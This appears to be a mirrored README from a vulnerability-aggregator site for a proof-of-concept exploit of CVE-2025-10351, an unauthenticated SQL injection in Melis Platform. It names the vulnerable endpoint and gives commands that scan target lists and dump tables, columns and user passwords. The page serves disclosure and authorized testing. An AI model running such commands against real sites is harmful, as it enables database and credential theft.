关联漏洞
描述
Exploit for CVE-2025-10351. SQL Injection on Melis Platform Framework
介绍
# CVE-2025-10351 POC - SQL Injection Exploit 💉
> POC for CVE-2025-10351: An unauthenticated SQL Injection vulnerability that affects a specific endpoint in Melis Platform Framework.



---
## 🔗 References
- 📄 [CVE-2025-10351 on MITRE](https://www.cve.org/CVERecord?id=CVE-2025-10351)
- 📄 [Melis Platform Warning on INCIBE (Spanish National Cybersecurity Institute)](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform)
---
## 🚀 Description
This POC targets an **unauthenticated error-based SQL injection** vulnerability in the endpoint:
```
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
```
It leverages `updatexml()` in MySQL to extract:
- Table names
- Column names
- Data from specific or all columns
It also detects possible **time-based SQLi** vectors for further manual exploitation.
---
## 🛠️ Requirements
Install dependencies with:
```bash
pip3 install -r requirements.txt
```
---
## 🧪 Usage
### Basic check
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
```
### From URL list
```bash
python3 CVE-2025-10351-POC.py -l targets.txt
```
### Extract all table names
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
```
### Extract all column names from a table
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
```
### Extract all data from all columns
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
```
### Extract specific columns
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
```
### Using proxy with insecure mode, cookies and debug mode
```bash
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
```
---
## ⚙️ Options
| Argument | Description |
|--------------|-----------------------------------------|
| `-u` | Target URL |
| `-p` | Port (80, 443, etc.) |
| `-l` | File containing list of URLs |
| `-s` | Sleep time for time-based tests (default: 1s) |
| `-at` | Dump all table names |
| `-t` | Specify table name |
| `-ac` | Dump all columns of given table |
| `-c` | Comma-separated list of columns to dump |
| `--proxy` | Burp Proxy http://127.0.0.1:8080 |
| `--insecure` | Disable TLS checks when using proxy connections |
| `--cookie` | Cookies for auth requests |
| `--debug` | Debug mode |
---
## 📤 Output
- Extracted tables saved to `tables_extracted.txt`
- Extracted data saved to `<table_name>_data.txt`
---
## ⚠️ Disclaimer
This document is for authorized security testing and remediation only. Do **not** use the PoC or reproduction steps against systems you do not own or do not have explicit permission to test. The author is not responsible for misuse.
---
Made with ❤️ by Manuel Iván San Martín Castillo
文件快照
[4.0K] /data/pocs/87f5643914675e3acd9393f0aed9ed12eb270376
├── [ 17K] CVE-2025-10351-POC.py
├── [1.0K] LICENSE
├── [3.3K] README.md
└── [ 72] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。